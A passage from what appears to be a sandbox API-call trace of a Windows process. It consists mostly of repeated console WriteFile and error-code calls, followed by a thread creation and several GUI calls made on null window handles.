lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.533] GetLastError () returned 0x0 [0069.533] SetLastError (dwErrCode=0x0) [0069.533] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.533] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.534] GetLastError () returned 0x0 [0069.534] SetLastError (dwErrCode=0x0) [0069.534] GetLastError () returned 0x0 [0069.534] SetLastError (dwErrCode=0x0) [0069.534] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0069.534] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0069.535] GetLastError () returned 0x0 [0069.535] SetLastError (dwErrCode=0x0) [0069.535] GetLastError () returned 0x0 [0069.535] SetLastError (dwErrCode=0x0) [0069.535] GetLastError () returned 0x0 [0069.535] SetLastError (dwErrCode=0x0) [0069.535] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0069.536] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0069.536] GetLastError () returned 0x0 [0069.536] SetLastError (dwErrCode=0x0) [0069.536] GetLastError () returned 0x0 [0069.536] SetLastError (dwErrCode=0x0) [0069.536] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.537] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.537] GetLastError () returned 0x0 [0069.537] SetLastError (dwErrCode=0x0) [0069.537] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.537] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.538] GetLastError () returned 0x0 [0069.538] SetLastError (dwErrCode=0x0) [0069.538] GetLastError () returned 0x0 [0069.538] SetLastError (dwErrCode=0x0) [0069.538] GetLastError () returned 0x0 [0069.538] SetLastError (dwErrCode=0x0) [0069.538] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.538] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.539] GetLastError () returned 0x0 [0069.539] SetLastError (dwErrCode=0x0) [0069.539] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.539] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.540] GetLastError () returned 0x0 [0069.540] SetLastError (dwErrCode=0x0) [0069.540] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.540] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.541] GetLastError () returned 0x0 [0069.541] SetLastError (dwErrCode=0x0) [0069.541] GetLastError () returned 0x0 [0069.541] SetLastError (dwErrCode=0x0) [0069.541] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.541] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.541] GetLastError () returned 0x0 [0069.541] SetLastError (dwErrCode=0x0) [0069.541] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.542] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.542] GetLastError () returned 0x0 [0069.542] SetLastError (dwErrCode=0x0) [0069.542] GetLastError () returned 0x0 [0069.542] SetLastError (dwErrCode=0x0) [0069.542] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0069.543] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0069.543] GetLastError () returned 0x0 [0069.543] SetLastError (dwErrCode=0x0) [0069.543] GetLastError () returned 0x0 [0069.543] SetLastError (dwErrCode=0x0) [0069.543] GetLastError () returned 0x0 [0069.544] SetLastError (dwErrCode=0x0) [0069.544] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0069.544] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0069.544] GetLastError () returned 0x0 [0069.544] SetLastError (dwErrCode=0x0) [0069.544] GetLastError () returned 0x0 [0069.544] SetLastError (dwErrCode=0x0) [0069.544] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.545] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.545] GetLastError () returned 0x0 [0069.545] SetLastError (dwErrCode=0x0) [0069.545] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.546] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.546] GetLastError () returned 0x0 [0069.546] SetLastError (dwErrCode=0x0) [0069.546] GetLastError () returned 0x0 [0069.546] SetLastError (dwErrCode=0x0) [0069.546] GetLastError () returned 0x0 [0069.546] SetLastError (dwErrCode=0x0) [0069.546] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.547] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.547] GetLastError () returned 0x0 [0069.547] SetLastError (dwErrCode=0x0) [0069.547] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.548] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.548] GetLastError () returned 0x0 [0069.548] SetLastError (dwErrCode=0x0) [0069.548] GetLastError () returned 0x0 [0069.548] SetLastError (dwErrCode=0x0) [0069.548] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.548] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.549] GetLastError () returned 0x0 [0069.549] SetLastError (dwErrCode=0x0) [0069.549] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.549] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.550] GetLastError () returned 0x0 [0069.550] SetLastError (dwErrCode=0x0) [0069.550] GetLastError () returned 0x0 [0069.550] SetLastError (dwErrCode=0x0) [0069.550] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0069.550] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0069.552] GetLastError () returned 0x0 [0069.552] SetLastError (dwErrCode=0x0) [0069.552] GetLastError () returned 0x0 [0069.552] SetLastError (dwErrCode=0x0) [0069.553] GetLastError () returned 0x0 [0069.553] SetLastError (dwErrCode=0x0) [0069.553] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0069.553] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0069.553] GetLastError () returned 0x0 [0069.553] SetLastError (dwErrCode=0x0) [0069.553] GetLastError () returned 0x0 [0069.553] SetLastError (dwErrCode=0x0) [0069.553] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.554] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.554] GetLastError () returned 0x0 [0069.554] SetLastError (dwErrCode=0x0) [0069.554] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.555] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.555] GetLastError () returned 0x0 [0069.555] SetLastError (dwErrCode=0x0) [0069.555] GetLastError () returned 0x0 [0069.555] SetLastError (dwErrCode=0x0) [0069.556] GetLastError () returned 0x0 [0069.556] SetLastError (dwErrCode=0x0) [0069.556] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.556] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.557] GetLastError () returned 0x0 [0069.557] SetLastError (dwErrCode=0x0) [0069.557] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.557] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.557] GetLastError () returned 0x0 [0069.557] SetLastError (dwErrCode=0x0) [0069.557] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.558] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.558] GetLastError () returned 0x0 [0069.558] SetLastError (dwErrCode=0x0) [0069.558] GetLastError () returned 0x0 [0069.558] SetLastError (dwErrCode=0x0) [0069.558] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.559] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.559] GetLastError () returned 0x0 [0069.559] SetLastError (dwErrCode=0x0) [0069.559] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.560] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.560] GetLastError () returned 0x0 [0069.560] SetLastError (dwErrCode=0x0) [0069.560] GetLastError () returned 0x0 [0069.560] SetLastError (dwErrCode=0x0) [0069.560] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0069.560] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0069.561] GetLastError () returned 0x0 [0069.561] SetLastError (dwErrCode=0x0) [0069.561] GetLastError () returned 0x0 [0069.561] SetLastError (dwErrCode=0x0) [0069.561] GetLastError () returned 0x0 [0069.561] SetLastError (dwErrCode=0x0) [0069.561] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0069.561] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0069.562] GetLastError () returned 0x0 [0069.562] SetLastError (dwErrCode=0x0) [0069.562] GetLastError () returned 0x0 [0069.562] SetLastError (dwErrCode=0x0) [0069.562] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.562] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.563] GetLastError () returned 0x0 [0069.563] SetLastError (dwErrCode=0x0) [0069.563] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.563] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.564] GetLastError () returned 0x0 [0069.564] SetLastError (dwErrCode=0x0) [0069.564] GetLastError () returned 0x0 [0069.564] SetLastError (dwErrCode=0x0) [0069.564] GetLastError () returned 0x0 [0069.564] SetLastError (dwErrCode=0x0) [0069.564] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.564] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.565] GetLastError () returned 0x0 [0069.565] SetLastError (dwErrCode=0x0) [0069.565] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.565] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.566] GetLastError () returned 0x0 [0069.566] SetLastError (dwErrCode=0x0) [0069.566] GetLastError () returned 0x0 [0069.566] SetLastError (dwErrCode=0x0) [0069.566] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.569] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.569] GetLastError () returned 0x0 [0069.569] SetLastError (dwErrCode=0x0) [0069.569] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.570] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.570] GetLastError () returned 0x0 [0069.570] SetLastError (dwErrCode=0x0) [0069.570] GetLastError () returned 0x0 [0069.570] SetLastError (dwErrCode=0x0) [0069.570] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0069.571] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0069.571] GetLastError () returned 0x0 [0069.571] SetLastError (dwErrCode=0x0) [0069.572] GetLastError () returned 0x0 [0069.572] SetLastError (dwErrCode=0x0) [0069.572] GetLastError () returned 0x0 [0069.572] SetLastError (dwErrCode=0x0) [0069.572] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0069.572] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0069.573] GetLastError () returned 0x0 [0069.573] SetLastError (dwErrCode=0x0) [0069.573] GetLastError () returned 0x0 [0069.573] SetLastError (dwErrCode=0x0) [0069.573] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.573] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.574] GetLastError () returned 0x0 [0069.574] SetLastError (dwErrCode=0x0) [0069.574] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.574] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.575] GetLastError () returned 0x0 [0069.575] SetLastError (dwErrCode=0x0) [0069.575] GetLastError () returned 0x0 [0069.575] SetLastError (dwErrCode=0x0) [0069.575] GetLastError () returned 0x0 [0069.575] SetLastError (dwErrCode=0x0) [0069.575] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.576] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.577] GetLastError () returned 0x0 [0069.577] SetLastError (dwErrCode=0x0) [0069.577] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.577] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.577] GetLastError () returned 0x0 [0069.577] SetLastError (dwErrCode=0x0) [0069.577] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.578] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.578] GetLastError () returned 0x0 [0069.579] SetLastError (dwErrCode=0x0) [0069.579] GetLastError () returned 0x0 [0069.579] SetLastError (dwErrCode=0x0) [0069.579] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.579] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.579] GetLastError () returned 0x0 [0069.579] SetLastError (dwErrCode=0x0) [0069.579] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.580] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0069.580] GetLastError () returned 0x0 [0069.580] SetLastError (dwErrCode=0x0) [0069.580] GetLastError () returned 0x0 [0069.580] SetLastError (dwErrCode=0x0) [0069.580] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.581] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x2, lpOverlapped=0x0) returned 1 [0069.581] GetLastError () returned 0x0 [0069.581] SetLastError (dwErrCode=0x0) [0069.581] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0069.581] GetLastError () returned 0x0 [0069.581] SetLastError (dwErrCode=0x0) [0069.582] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.582] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.582] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0069.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41d36e, lpParameter=0x20d4740, dwCreationFlags=0x4, lpThreadId=0x20d4740 | out: lpThreadId=0x20d4740*=0x658) returned 0x1f4 [0069.584] ResumeThread (hThread=0x1f4) returned 0x1 [0069.584] GetLastError () returned 0x0 [0069.584] SetLastError (dwErrCode=0x0) [0069.584] GetLastError () returned 0x0 [0069.584] SetLastError (dwErrCode=0x0) [0069.584] GetLastError () returned 0x0 [0069.584] SetLastError (dwErrCode=0x0) [0069.584] GetLastError () returned 0x0 [0069.584] SetLastError (dwErrCode=0x0) [0069.584] GetLastError () returned 0x0 [0069.584] SetLastError (dwErrCode=0x0) [0069.584] GetLastError () returned 0x0 [0069.584] SetLastError (dwErrCode=0x0) [0069.584] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0ec | out: lpMode=0x19e0ec) returned 1 [0069.585] WriteFile (in: hFile=0x3c, lpBuffer=0x19e118*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19e0fc, lpOverlapped=0x0 | out: lpBuffer=0x19e118*, lpNumberOfBytesWritten=0x19e0fc*=0x2, lpOverlapped=0x0) returned 1 [0069.585] GetLastError () returned 0x0 [0069.585] SetLastError (dwErrCode=0x0) [0069.585] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0ec | out: lpMode=0x19e0ec) returned 1 [0069.585] WriteFile (in: hFile=0x3c, lpBuffer=0x19e118*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19e0fc, lpOverlapped=0x0 | out: lpBuffer=0x19e118*, lpNumberOfBytesWritten=0x19e0fc*=0x2, lpOverlapped=0x0) returned 1 [0069.586] GetLastError () returned 0x0 [0069.586] SetLastError (dwErrCode=0x0) Thread: id = 6 os_tid = 0x534 Thread: id = 7 os_tid = 0x16c Thread: id = 8 os_tid = 0x8c8 Thread: id = 9 os_tid = 0x658 [0069.598] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.598] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0069.598] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.598] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0069.598] GetLastError () returned 0x0 [0069.598] SetLastError (dwErrCode=0x0) [0069.599] GetMenu (hWnd=0x0) returned 0x0 [0069.599] CheckMenuRadioItem (hmenu=0x0, first=0x10, last=0x0, check=0x125, flags=0x0) returned 0 [0069.599] DestroyWindow (hWnd=0x0) returned 0 [0069.600] GetMenu (hWnd=0x0) returned 0x0 [0069.600] CheckMenuRadioItem (hmenu=0x0, first=0x0, last=0x1, check=0x0, flags=0x0) returned 0 [0069.600] GetClientRect (in: hWnd=0x0, lpRect=0x20bf340 | out: lpRect=0x20bf340) returned 0 [0069.600] ScrollWindowEx (in: hWnd=0x0, dx=0, dy=0, prcScroll=0x0, prcClip=0x0, hrgnUpdate=0x0, prcUpdate=0x20bf340, flags=0x6 | out: prcUpdate=0x20bf340) returned 0 [0069.600] SetScrollInfo (hwnd=0x0, nBar=0, lpsi=0x20bf29c, redraw=1) returned 0 [0069.894] GetClientRect (in: 